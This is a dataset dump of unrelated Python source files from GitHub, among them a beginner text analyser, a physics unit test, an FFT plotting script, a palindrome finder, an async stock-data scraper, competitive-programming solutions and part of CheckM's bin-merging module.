Other fish such as paddlefish,\r\ngarpike and stingray are also present.'''\r\n}\r\n\r\nusers = [\"bob\", \"ann\", \"mike\", \"liz\"]\r\npassw = [\"123\", \"pass123\", \"password123\", \"pass123\"]\r\n\r\ndash = (\"-\" * 40)\r\nstar = \"*\"\r\ndash1 = \"|\"\r\n\r\nword = []\r\nindexLetter = 0\r\nUpperLatter = 0\r\nLowLetter = 0\r\ntitlecase = 0\r\nUppercaseWords = 0\r\nLowWords = 0\r\n\r\nnumbersList = []\r\nnumbers = ''\r\nSuma = 0\r\n\r\nIndexWorlds = []\r\n\r\nSequenceOfNumbers = 1\r\nLenWords = 0\r\n\r\nLenWordList = []\r\nFinishLIST1 = []\r\nFinishLIST2 = []\r\n\r\n\r\nwhile True:\r\n correctUser = False\r\n\r\n userName = input(\"Username: \")\r\n\r\n for userNum in range(len(users)):\r\n if userName == users[userNum]:\r\n correctUser = True\r\n tmpPass = userNum\r\n print(\"Good usernane\")\r\n break\r\n \r\n if correctUser == True:\r\n password = input(\"Password: \")\r\n \r\n if password == passw[tmpPass]:\r\n print(\"Successful login\")\r\n break\r\n else:\r\n print(\"wrong password, try again\")\r\n \r\n else:\r\n print(\"unregistered user, try again\")\r\n\r\nprint(dash)\r\nprint(\"Welcome to the app,\", userName)\r\nprint(\"We have 3 texts to be analyzed.\")\r\nprint(dash)\r\n\r\n\r\nTextNumberSTR = input(\"Enter a number btw. 1 and 3 to select: \")\r\nTextNumberINT = (int(TextNumberSTR))\r\n\r\nfor words in text[TextNumberINT].split():\r\n word.append (words.strip(\",.:;'\").lower())\r\n lenWord = (len(words))\r\n IndexWorlds.append (lenWord)\r\n\r\n for letter in words.strip(\",.:;'/\\|<>^=0123456789\"):\r\n if letter == letter.upper():\r\n if indexLetter == 0:titlecase += 1\r\n \r\n UpperLatter += 1\r\n\r\n elif letter == letter.lower():\r\n LowLetter += 1\r\n\r\n indexLetter += 1\r\n\r\n if UpperLatter == indexLetter and indexLetter != 0:\r\n UppercaseWords += 1\r\n elif LowLetter == indexLetter and indexLetter != 0:\r\n LowWords += 1\r\n\r\n indexLetter = 0\r\n LowLetter = 0\r\n UpperLatter = 0\r\n\r\nfor number in text[TextNumberINT]:\r\n if '0' <= number <= '9':\r\n numbers += number\r\n else:\r\n if numbers != '':\r\n numbersList.append(int(numbers))\r\n Suma += int(numbers)\r\n numbers = \"\"\r\n\r\nprint(dash)\r\nprint(f\"There are {len(word)} words in the selected text.\")\r\nprint(f\"There are {titlecase} titlecase words.\")\r\nprint(f\"There are {UppercaseWords} uppercase words.\")\r\nprint(f\"There are {LowWords} lowercase words.\")\r\nprint(f\"There are {len(numbersList)} numeric strings.\")\r\nprint(f\"The sum of all the numbers {Suma}\")\r\nprint(dash)\r\nprint(\"\"\"LEN| OCCURENCES |NR.\"\"\")\r\n\r\nIndexWorlds.sort()\r\n\r\nfor number1 in IndexWorlds:\r\n if number1 == SequenceOfNumbers:\r\n LenWords += 1\r\n else:\r\n FinishLIST1.append(SequenceOfNumbers)\r\n FinishLIST2.append(LenWords)\r\n LenWords = 0\r\n SequenceOfNumbers += 1\r\n\r\n if number1 == SequenceOfNumbers:\r\n LenWords += 1\r\n\r\nFinishLIST1.append(SequenceOfNumbers)\r\nFinishLIST2.append(LenWords)\r\n\r\nfor alignment in range(len(FinishLIST1)):\r\n alignment_FinishLIST2 = FinishLIST2[alignment]\r\n print(f\"{FinishLIST1[alignment]:<{2}} | {alignment_FinishLIST2 * star:<{20}}|{FinishLIST2[alignment]:>{0}} \")\r\n\r\n\r\n\r\n\r\n","repo_name":"AdamKushnir/projekt1.py-prvn-projekt-do-Engeto-Online-Python-Akademie-Adam-Ku-nir","sub_path":"první projekt do Engeto.py","file_name":"první projekt do Engeto.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39361214076","text":"import 
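The word-length histogram printed at the end of the Engeto script above (the LEN | OCCURENCES table) can be produced directly with collections.Counter instead of the manual run-length loop over sorted lengths; a sketch on stand-in words:

from collections import Counter

words = "Situated about ten miles west of Kemmerer".split()
length_counts = Counter(len(w) for w in words)
for length in sorted(length_counts):
    n = length_counts[length]
    print(f"{length:<2} | {'*' * n:<20}|{n}")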
sys\nsys.path.append(\"./build\")\n\ntry:\n import unittest\n import tempfile\nexcept:\n print(\"***********************************************************\")\n print(\"* WARNING!! Couldn't import python unittesting framework! *\")\n print(\"* No python tests have been executed *\")\n print(\"***********************************************************\")\n sys.exit(0)\n\ntry:\n import crpropa as crp\nexcept Exception as e:\n print(\"*** CRPropa import failed\")\n print(type(e), str(e))\n sys.exit(-1)\n\ntry:\n import FieldlineIntegrator as fli\nexcept Exception as e:\n print(\"*** FieldlineIntegrator import failed\")\n print(type(e), str(e))\n sys.exit(-1)\n\nclass testSimpleFieldlineIntegration(unittest.TestCase):\n def runTest(self):\n \n bfield = crp.UniformMagneticField(crp.Vector3d(0,0,1))\n \n #propagation parallel to magnetic field\n integrator = fli.FieldlineIntegrator(bfield, 1e-4, 1*crp.pc, 1*crp.pc, True)\n\n c = crp.Candidate()\n c.current.setPosition(crp.Vector3d(0))\n\n integrator.process(c)\n\n self.assertEqual(c.current.getPosition().x, 0.)\n self.assertEqual(c.current.getPosition().y, 0.)\n self.assertAlmostEqual(c.current.getPosition().z/crp.pc, 1)\n\n #propagation anti-parallel to magnetic field\n integrator.setDirection(False)\n\n c = crp.Candidate()\n c.current.setPosition(crp.Vector3d(0))\n\n integrator.process(c)\n\n self.assertEqual(c.current.getPosition().x, 0.)\n self.assertEqual(c.current.getPosition().y, 0.)\n self.assertAlmostEqual(c.current.getPosition().z/crp.pc, -1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"lukasmerten/CRPropa_FieldLineIntegrator","sub_path":"testFieldlineIntegrator.py","file_name":"testFieldlineIntegrator.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505577561","text":"import sys\n\nimport numpy as np\nimport tables as tb\nimport matplotlib.pyplot as plt\n\n#from scipy import signal\n\n\ndef getWF(inF, ipm, ievt):\n \"\"\" Get a specific waveform from file \"\"\"\n\n return inF.root.RD.pmtrwf[ievt][ipm]\n\n\ndef check_pmt_fft():\n\n file_name1 = sys.argv[1]\n file_name2 = sys.argv[2]\n\n with tb.open_file(file_name1) as file1, tb.open_file(file_name2) as file2:\n ## just 10 events for now\n for ievt in range(10):\n\n for ipm in range(12):\n\n wf1 = getWF(file1, ipm, ievt)\n wf2 = getWF(file2, ipm, ievt)\n\n zeroed1 = wf1 - np.mean(wf1[:10000])\n zeroed2 = wf2 - np.mean(wf2[:10000])\n\n freq = np.fft.rfftfreq(len(zeroed1), d=25E-9)\n ft1 = np.fft.rfft(zeroed1)\n ft2 = np.fft.rfft(zeroed2)\n\n plt.plot(freq, np.absolute(ft1), label='file1, pmt '+str(ipm))\n plt.plot(freq, np.absolute(ft2), label='file2, pmt '+str(ipm))\n plt.legend()\n plt.show()\n\n\nif __name__ == '__main__':\n check_pmt_fft()\n","repo_name":"carmenromo/Calibration_scripts","sub_path":"fft_check.py","file_name":"fft_check.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9894098723","text":"#\n# curpal.py: looks for current palindromes in the source of Ailihphilia\n#\n# based on one word read in\n\nfrom collections import defaultdict\nimport re\nimport i7\nimport sys\n\nglobal_count = 0\npalcomp = defaultdict(int)\nmy_word = 'eh'\ntrack_nothing = False\n\nif len(sys.argv) > 1: my_word = sys.argv[1]\n\ndef is_palindrome(q):\n    return q == q[::-1]\n\ndef scour_file(f):\n    this_file = 0\n    with open(f) as file:\n        for (line_count, line) in 
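check_pmt_fft above compares amplitude spectra of baseline-subtracted waveforms sampled every 25 ns. The core rfft bookkeeping, on a synthetic trace (the 1 MHz test tone and trace length are stand-ins):

import numpy as np

fs = 1 / 25e-9                                 # 40 MHz sampling rate
t = np.arange(4096) / fs
wf = np.sin(2 * np.pi * 1e6 * t)               # 1 MHz test tone
wf -= wf[:1000].mean()                         # pedestal (baseline) subtraction
freq = np.fft.rfftfreq(len(wf), d=25e-9)
amp = np.abs(np.fft.rfft(wf))
print(freq[amp.argmax()])                      # peaks near 1e6 Hz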
enumerate(file, 1):\n l2 = re.sub(\"'\", \"\", line.lower().strip())\n lws = re.split(\"[^a-z]+\", l2)\n ll = len(lws)\n for x in range(0, ll):\n if lws[x] == my_word:\n if x > 0 and is_palindrome(lws[x-1] + lws[x]):\n print(lws[x-1],lws[x], line_count, l2)\n this_file += 1\n palcomp[lws[x-1]] += 1\n if x < ll - 1 and is_palindrome(lws[x] + lws[x+1]):\n print(lws[x], lws[x+1], line_count, l2)\n this_file += 1\n palcomp[lws[x+1]] += 1\n if this_file: print(f, \"found\", this_file, \"palindrome{:s}.\".format(i7.plur(this_file)))\n elif track_nothing: print(f, \"found nothing\")\n return this_file\n\nfor q in i7.i7f['ailihphilia']:\n global_count += scour_file(q)\n\nif global_count: print(\"Total pals found for\", my_word + \":\", global_count)\nelse: sys.exit(\"Nothing found for\", my_word)\n\nones = []\n\nfor q in sorted(palcomp.keys(), key=palcomp.get):\n if palcomp[q] > 1: print(my_word, q, palcomp[q])\n else: ones.append(q)\n\nif len(ones): print(\"Singletons:\", ', '.join(sorted(ones)))","repo_name":"andrewschultz/ailihphilia","sub_path":"utils/curpal.py","file_name":"curpal.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7600362625","text":"import torch\n\nfrom api.endpoints.classification import get_work_scores, get_tag_scores\nfrom api.endpoints.similar import get_similar\nimport torch.nn.functional as F\nfrom schemas.user import UserInfo\nfrom curd.Classification import get_candidate\nfrom database.mongodb import connect_result\n\n\nasync def get_all_dict(temp: UserInfo):\n id = temp.id\n ids = temp.ids\n # 整合所有模型\n work_scores = await get_work_scores(temp)\n similar_scores = await get_similar(temp)\n tag_scores = await get_tag_scores(id)\n cands = await get_candidate(ids)\n\n all_scores = []\n # 将相似度模型的结果与分类模型的结果求和\n for cand in cands:\n scores = {cand: work_scores[cand] + similar_scores[cand]}\n all_scores.append(scores)\n # 重新分类之前的处理\n before = []\n for score in all_scores:\n before.append(list(score.values())[0])\n\n print(before)\n # 重新分类\n final = F.softmax(torch.tensor(before))\n\n # 信息整合到一个字典里\n all_scores_final = [{'id': id}]\n\n for i in range(len(all_scores)):\n tmp = {list(all_scores[i].keys())[0]: final[i].item()}\n all_scores_final.append(tmp)\n\n # if tag_scores['工作变动稳定'] > tag_scores['工作变动频繁']:\n # all_scores_final.append({\"tag\": '工作变动稳定'})\n # elif tag_scores['工作变动稳定'] < tag_scores['工作变动频繁']:\n # all_scores_final.append({\"tag\": '工作变动频繁'})\n\n all_dict = {}\n for dic in all_scores_final:\n all_dict = {**all_dict, **dic}\n\n return all_dict\n\n\nasync def to_mongodb(all_dict):\n result = await connect_result()\n result.insert_one(all_dict)","repo_name":"spumant/fxxk","sub_path":"curd/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"74990241794","text":"from tkinter import *\nfrom sp2txt import microphone\n\nroot = Tk()\nroot.title(\"Abler\")\nroot.geometry(\"500x250+\"+str(root.winfo_screenwidth()-500)+\"+\"+str(root.winfo_screenheight()-250))\nname = Label(root, text=\"Event Viewer : \")\nText = StringVar()\n\ndef Button1(event):\n\tglobal Text\n\tText.set('Event Viewer : ON/OFF button pressed!')\n\tmicrophone()\n\ndef Button2(event):\n\tglobal Text\n\tText.set('Event Viewer : Capslocks pressed!')\n\ndef Button3(event):\n\tglobal Text\n\tText.set('Event Viewer : Button3 pressed!')\n\n#GUI Part\ndef GUI():\n\n\tText.set(\"Event 
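curpal.py above checks whether a target word forms a palindrome with its left or right neighbour. The kernel of that check, isolated on a stand-in line of text:

import re

def is_palindrome(q: str) -> bool:
    return q == q[::-1]

line = "Step on no pets, sir"
words = [w for w in re.split(r"[^a-z]+", line.lower()) if w]
# Test each adjacent pair, concatenated, for palindromicity.
pairs = [(a, b) for a, b in zip(words, words[1:]) if is_palindrome(a + b)]
print(pairs)  # [('on', 'no')]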
Viewer : \")\n\ttest = Label(root, text=\"\")\n\tname = Label(root, textvariable=Text)\n\tbutton1 = Button(root, text=\"ON/OFF\", height=10, width=15)\n\tbutton2 = Button(root, text=\"CapsLocks\", height=10, width=15)\n\tbutton3 = Button(root, text=\"Button3\", height=10, width=15)\n\tname.grid(row=0, column=0, sticky=W,columnspan = 3)\n\ttest.grid(row=1, column=0)\n\tbutton1.grid(row=2, column=0)\n\tbutton2.grid(row=2, column=1)\n\tbutton3.grid(row=2, column=2)\n\tbutton1.bind(\"\", Button1)\n\tbutton2.bind(\"\", Button2)\n\tbutton3.bind(\"\", Button3)\n\troot.mainloop()\nGUI()","repo_name":"bansal-dhruv/falcons","sub_path":"Keyboard/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35203359089","text":"import sys\nfrom collections import defaultdict, Counter, deque\nfrom itertools import permutations, combinations, product, combinations_with_replacement, groupby, accumulate\nimport operator\nfrom math import sqrt, gcd, factorial\nfrom copy import deepcopy\n# from math import isqrt, prod,comb # python3.8用(notpypy)\n#from bisect import bisect_left,bisect_right\n#from functools import lru_cache,reduce\n#from heapq import heappush,heappop,heapify,heappushpop,heapreplace\n#import numpy as np\n#import networkx as nx\n#from networkx.utils import UnionFind\n#from numba import njit, b1, i1, i4, i8, f8\n#from scipy.sparse import csr_matrix\n#from scipy.sparse.csgraph import shortest_path, floyd_warshall, dijkstra, bellman_ford, johnson, NegativeCycleError\n# numba例 @njit(i1(i4[:], i8[:, :]),cache=True) 引数i4配列、i8 2次元配列,戻り値i1\ndef input(): return sys.stdin.readline().rstrip()\ndef divceil(n, k): return 1+(n-1)//k # n/kの切り上げを返す\ndef yn(hantei, yes='Yes', no='No'): print(yes if hantei else no)\n\nclass PrepereFactorial2: # maxnumまでの階乗を事前計算して、順列、組み合わせ、重複組み合わせを計算するクラス。逆元のテーブルもpow無しで前計算する。maxnumに比べて関数呼び出しが多いならこちら\n def __init__(self, maxnum=3*10**5, mod=10**9+7):\n self.factorial = [1]*(maxnum+1)\n modinv_table = [-1] * (maxnum+1)\n modinv_table[1] = 1\n for i in range(2, maxnum+1):\n self.factorial[i] = (self.factorial[i-1]*i) % mod\n modinv_table[i] = (-modinv_table[mod % i] * (mod // i)) % mod\n self.invfactorial = [1]*(maxnum+1)\n for i in range(1, maxnum+1):\n self.invfactorial[i] = self.invfactorial[i-1]*modinv_table[i] % mod\n self.mod = mod\n\n def permutation(self, n, r):\n return self.factorial[n]*self.invfactorial[n-r] % self.mod\n\n def combination(self, n, r):\n if r < 0 or r > n:\n return 0\n return self.permutation(n, r)*self.invfactorial[r] % self.mod\n\n def combination_with_repetition(self, n, r):\n return self.combination(n+r-1, r)\n\n#https://atcoder.jp/contests/practice2/submissions/16789717\np, g, ig = 998244353, 3, 332748118\nW = [pow(g, (p - 1) >> i, p) for i in range(24)]\niW = [pow(ig, (p - 1) >> i, p) for i in range(24)]\n \ndef fft(k, f):\n for l in range(k, 0, -1):\n d = 1 << l - 1\n U = [1]\n for i in range(d):\n U.append(U[-1] * W[l] % p)\n \n for i in range(1 << k - l):\n for j in range(d):\n s = i * 2 * d + j\n f[s], f[s+d] = (f[s] + f[s+d]) % p, U[j] * (f[s] - f[s+d]) % p\n \ndef ifft(k, f):\n for l in range(1, k + 1):\n d = 1 << l - 1\n for i in range(1 << k - l):\n u = 1\n for j in range(i * 2 * d, (i * 2 + 1) * d):\n f[j+d] *= u\n f[j], f[j+d] = (f[j] + f[j+d]) % p, (f[j] - f[j+d]) % p\n u = u * iW[l] % p\n \ndef convolution(a, b):\n n0 = len(a) + len(b) - 1\n k = (n0).bit_length()\n n = 1 << k\n a = a + [0] * (n - len(a))\n b = 
b + [0] * (n - len(b))\n fft(k, a), fft(k, b)\n for i in range(n):\n a[i] = a[i] * b[i] % p\n ifft(k, a)\n invn = pow(n, p - 2, p)\n for i in range(n0):\n a[i] = a[i] * invn % p\n del a[n0:]\n return a\n\n\ndef main():\n mod = 10**9+7\n mod2 = 998244353\n r, g, b, k = map(int, input().split())\n x, y, z = map(int, input().split())\n pf = PrepereFactorial2(6*10**5+1, mod2)\n rless = k-y\n gless = k-z\n bless = k-x\n \"\"\"\n 問題の条件を以下のように言い換える。\n\n 赤をk-y個未満選ぶ・緑をk-z個未満選ぶ・青をk-x個未満選ぶの3条件を\n 全て満たさない。\n \n 包除原理により、k個選ぶ全体から、上記条件を1個以上満たす選び方を引いて、条件を2個以上満たす選び方を足して、条件を3個満たす選び方を引けばよい。\n \"\"\"\n #k個選ぶ全体\n ans = pf.combination(r+g+b, k) \n rcomb = [0]*rless\n gcomb = [0]*gless\n bcomb = [0]*bless\n #条件を1個以上満たす選び方\n for i in range(rless):\n a = pf.combination(r, i)\n rcomb[i] = a\n ans -= a*pf.combination(g+b, k-i)\n for i in range(gless):\n a = pf.combination(g, i)\n gcomb[i] = a\n ans -= a*pf.combination(r+b, k-i)\n for i in range(bless):\n a = pf.combination(b, i)\n bcomb[i] = a\n ans -= a*pf.combination(r+g, k-i)\n #条件を2個以上満たす選び方\n if rless and gless:\n rgcomb = convolution(rcomb, gcomb)\n for i in range(rless+gless-1):\n ans += rgcomb[i]*pf.combination(b, k-i)\n if rless and bless:\n rbcomb = convolution(rcomb, bcomb)\n for i in range(rless+bless-1):\n ans += rbcomb[i]*pf.combination(g, k-i)\n if gless and bless:\n gbcomb = convolution(gcomb, bcomb)\n for i in range(gless+bless-1):\n ans += gbcomb[i]*pf.combination(r, k-i)\n #条件を3個満たす選び方\n if rless and gless and bless and rless+gless+bless-3 >= k:\n ans -= convolution(rgcomb[:k+1],bcomb[:k+1])[k]\n print(ans % mod2)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"ansainbdg/my_kyopro_ans","sub_path":"typical_90/065.py","file_name":"065.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23442469331","text":"import sys\nsys.stdin = open('B-small-attempt0.in', 'r')\nsys.stdout = open('B.out','w')\n\nfor p in range(int(input())):\n\tA, B, K = map(int, input().split())\n\tS = 0\n\tfor i in range(A):\n\t\tfor j in range(B):\n\t\t\tif i & j < K:\n\t\t\t\tS += 1\n\tprint(\"Case #%d: %d\" % (p+1, S))\n\t\n\n\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_143/552.py","file_name":"552.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33644084518","text":"buy = int(input())\r\nresult = 0\r\nif(buy>2):\r\n for i in range(1,buy+1):\r\n if(i % 3 == 0):\r\n result += 1\r\n while(result % 3 == 0):\r\n x = result // 3\r\n result += x\r\n ez = buy - (3*result)\r\n if(result > 2):\r\n for j in range(1,result+ez+1):\r\n if(j % 3 == 0):\r\n result += 1\r\n\r\n y = result+buy\r\n while(y % 3 == 0):\r\n y += 1\r\n print(y)\r\nelse:\r\n print(buy+result) ","repo_name":"chanasorn1234/Learning-Python","sub_path":"Problem/pyth25.py","file_name":"pyth25.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73990302915","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 13 18:12:35 2022\r\n\r\n@author: 1\r\n\"\"\"\r\ndef legendre(n,m,x):\r\n if n==0:\r\n if m>=1:\r\n return 0\r\n else:\r\n return 1\r\n \r\n \r\n s=np.zeros([n+1,m+1])\r\n \r\n for j in range(0,m+1):\r\n if j==0:\r\n s[0,j]=1\r\n s[1,j]=x\r\n for k in range(1,n):\r\n s[k+1,j]=((2*k+1)*x*s[k,j]-k*s[k-1,j])/(k+1)\r\n \r\n else:\r\n s[0,j]=0\r\n 
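The fft/ifft/convolution routines above implement a number-theoretic transform mod 998244353, and the Japanese comments in main() restate the problem as three "fewer than k-y / k-z / k-x" conditions and apply inclusion-exclusion over them. As a sanity check, any such convolution must agree with the naive O(n*m) polynomial product; a standalone reference implementation (plain Python, not the NTT itself):

p = 998244353

def naive_convolution(a, b):
    out = [0] * (len(a) + len(b) - 1)
    for i, x in enumerate(a):
        for j, y in enumerate(b):
            out[i + j] = (out[i + j] + x * y) % p
    return out

# (1 + 2x)(3 + 4x + 5x^2) = 3 + 10x + 13x^2 + 10x^3
print(naive_convolution([1, 2], [3, 4, 5]))  # [3, 10, 13, 10]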
if j==1:\r\n s[1,j]=1\r\n else:\r\n s[1,j]=0\r\n \r\n for k in range(1,n):\r\n s[k+1,j]=(2*k+1)*s[k,j-1]+s[k-1,j]\r\n \r\n r=s[n,m]\r\n \r\n return r\r\n\r\ndef legendregauss(n,m):\r\n if n==0:\r\n return []\r\n\r\n z=[]\r\n error=1e-14\r\n h=n**(-2)\r\n a=-1\r\n b=a+h\r\n \r\n for k in range(1,n-m+1):\r\n \r\n legendre_a=legendre(n,m,a)\r\n legendre_b=legendre(n,m,b)\r\n while(legendre_a*legendre_b>0):\r\n a=b\r\n legendre_a=legendre_b\r\n \r\n b=a+h\r\n legendre_b=legendre(n,m,b)\r\n \r\n x=(a+b)*0.5\r\n xright=b\r\n while(np.abs(x-xright)>error):\r\n xright=x\r\n x=x-legendre(n,m,x)/legendre(n,m+1,x)\r\n \r\n z.append(x)\r\n a=x+h\r\n b=a+h\r\n \r\n return np.array(z)","repo_name":"wangnianrui2333/-","sub_path":"legendregauss.py","file_name":"legendregauss.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40991929741","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nimport cv2\nfrom sensor_msgs.msg import Image ############\nfrom cv_bridge import CvBridge, CvBridgeError ##############\nfrom std_msgs.msg import String ############### \n\n\ndef camera_NSF():\n while True:\n pub = rospy.Publisher(\"camera_topic\", Image, queue_size=10) ######'camera_topic' topic,message type is IMAGE\n rospy.init_node('camera', anonymous=True) ######## name of the node is \"camera\"\n rate=rospy.Rate(10) ###########\n \n ret, frame = cap.read()\n cv2.imshow('video', frame)\n cv2.waitKey(3)\n print('sending frames cont.......')\n \n\n \n bridge= CvBridge() ###############\n ros_image = bridge.cv2_to_imgmsg(frame, \"bgr8\") ##############\n \n \n \n pub.publish(ros_image) ######\n rate.sleep()#########\n \n\nif __name__ == '__main__':\n\n\n cap = cv2.VideoCapture(0)\n \n try:\n camera_NSF()\n \n \n except rospy.ROSInterruptException:\n pass\n","repo_name":"naseef139/Robot-Assistant-Dev-Bank","sub_path":"face_detector/camera_node.py","file_name":"camera_node.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26369455642","text":"import asyncio\nimport json\nimport re\nfrom heapq import nlargest\nfrom typing import Dict, List\n\nimport aiohttp\n\nfrom bs4 import BeautifulSoup\n\n\nasync def get_page(url: str) -> str:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n return await response.text()\n\n\nasync def get_exchange_rate() -> float:\n \"\"\"Return current exchange rate USD to RUB.\"\"\"\n url_cbr = \"http://www.cbr.ru/scripts/XML_daily.asp\"\n page = await get_page(url_cbr)\n page = BeautifulSoup(page, \"lxml\")\n exchange_rate = page.find(id=\"R01235\").find_next(\"value\").get_text()\n return float(exchange_rate.replace(\",\", \".\"))\n\n\nasync def get_companies_from_page(path: str, page: int) -> List:\n \"\"\"Get information about companies from table.\n\n Args:\n path: path to the website.\n page: number of the page we get information from.\n\n Returns:\n List with information about companies (company name, link and growth).\n\n \"\"\"\n start_page = path + \"index/components/s&p_500\"\n base_url = start_page + \" ?p={}\"\n companies = []\n page = BeautifulSoup(await get_page(base_url.format(page)), \"lxml\")\n table = page.find(class_=\"table table-small\")\n\n for row in table.find_all(\"tr\")[1:]:\n name = row.find(\"a\")[\"title\"]\n href = row.find(\"a\")[\"href\"]\n growth = row.find_all(\"td\")[9].text.split()[1]\n companies.append([name, 
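The legendre(n, m, x) routine above builds P_n and its derivatives from the Bonnet recurrence (k+1)P_{k+1} = (2k+1)x P_k - k P_{k-1}. For the m = 0 case it can be cross-checked against numpy's Legendre evaluator (n = 5 and x = 0.3 are arbitrary test values):

import numpy as np

def legendre_p(n: int, x: float) -> float:
    # Bonnet recurrence, the m = 0 case of the routine above.
    p_prev, p = 1.0, x
    if n == 0:
        return p_prev
    for k in range(1, n):
        p_prev, p = p, ((2 * k + 1) * x * p - k * p_prev) / (k + 1)
    return p

x = 0.3
coeffs = [0] * 5 + [1]          # coefficient vector selecting P_5
print(legendre_p(5, x), np.polynomial.legendre.legval(x, coeffs))  # both ~0.345386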
href, float(growth[:-1])])\n return companies\n\n\nasync def page_count(path: str) -> int:\n \"\"\"Return number of pages with tables.\"\"\"\n start_page = path + \"index/components/s&p_500\"\n page = await get_page(start_page)\n page = BeautifulSoup(page, \"lxml\")\n pages = page.find(\"div\", class_=\"finando_paging\").find_all(\"a\")\n return int(pages[-1].text)\n\n\nasync def get_companies_from_all_pages() -> List[List]:\n \"\"\"Collect iformation from all pages using async methods.\"\"\"\n path = \"https://markets.businessinsider.com/\"\n pages = await page_count(path)\n tasks = [get_companies_from_page(path, i) for i in range(1, pages + 1)]\n return await asyncio.gather(*tasks)\n\n\nasync def get_company_info(company: List, exchange_rate: float) -> Dict:\n \"\"\"Parse company page and return dictionary with information.\"\"\"\n start_page = \"https://markets.businessinsider.com\"\n base_url = start_page + company[1]\n page = BeautifulSoup(await get_page(base_url), \"lxml\")\n table = page.find(\"span\", class_=\"price-section__category\")\n code = table.find(\"span\").text[2:]\n table = page.find(class_=\"price-section__current-value\")\n price = float(table.text.replace(\",\", \"\")) * exchange_rate\n script = page.find(\"div\", class_=\"snapshot\").find(\"script\")\n week_low = float(re.findall(r\"low52weeks: (\\d*.\\d*),\", script.string)[0])\n week_high = float(re.findall(r\"high52weeks: (\\d*.\\d*),\", script.string)[0])\n try:\n pe = float(\n page.find(\"div\", class_=\"snapshot\")\n .find_all(class_=\"snapshot__data-item\")[6]\n .text.split()[0]\n )\n except ValueError:\n pe = -1\n return {\n \"name\": company[0],\n \"href\": company[1],\n \"growth\": company[2],\n \"code\": code,\n \"P/E\": pe,\n \"price\": round(price, 2),\n \"potential profit\": round((week_high - week_low) / week_low, 2),\n }\n\n\ndef save_to_json(filename: str, value_name: str, data: List[Dict]) -> None:\n with open(filename + \".json\", \"w\") as file:\n top_10 = [\n {\n \"name\": data[i][\"name\"],\n \"code\": data[i][\"code\"],\n f\"{value_name}\": data[i][value_name],\n }\n for i in range(10)\n ]\n json.dump(top_10, file, indent=4)\n\n\nasync def get_all_information() -> List[Dict]:\n \"\"\"Return information about all companies.\n\n Do it fast because of async method.\n\n \"\"\"\n companies = await get_companies_from_all_pages()\n exchange_rate = await get_exchange_rate()\n tasks = []\n for page in companies:\n for company in page:\n tasks.append(get_company_info(company, exchange_rate))\n return await asyncio.gather(*tasks)\n\n\ndef main() -> None:\n \"\"\"Start point.\"\"\"\n companies_info = asyncio.run(get_all_information())\n save_to_json(\n \"top_growth\",\n \"growth\",\n nlargest(10, companies_info, key=lambda x: x[\"growth\"]),\n )\n save_to_json(\n \"top_PE\",\n \"P/E\",\n nlargest(10, companies_info, key=lambda x: x[\"P/E\"]),\n )\n save_to_json(\n \"top_price\",\n \"price\",\n nlargest(10, companies_info, key=lambda x: x[\"price\"]),\n )\n param = \"potential profit\"\n save_to_json(\n \"top_potential_profit\",\n param,\n nlargest(10, companies_info, key=lambda x: x[param]),\n )\n","repo_name":"Angelina151612/epam_python","sub_path":"hw/hw_10_task_01.py","file_name":"hw_10_task_01.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020904304","text":"###############################################################################\n#\n# merger.py - identify bins with complementary sets 
of marker genes\n#\n###############################################################################\n# #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nimport os\nimport sys\nimport logging\n\nfrom checkm.common import checkDirExists\nfrom checkm.resultsParser import ResultsParser\n\n\nclass Merger():\n def __init__(self):\n self.logger = logging.getLogger()\n\n def run(self, binFiles, outDir, hmmTableFile,\n binIdToModels, binIdToBinMarkerSets,\n minDeltaComp, maxDeltaCont,\n minMergedComp, maxMergedCont):\n checkDirExists(outDir)\n\n self.logger.info(' Comparing marker sets between all pairs of bins.')\n\n # ensure all bins are using the same marker set\n markerGenesI = binIdToBinMarkerSets[list(binIdToBinMarkerSets.keys())[0]].mostSpecificMarkerSet().getMarkerGenes()\n for 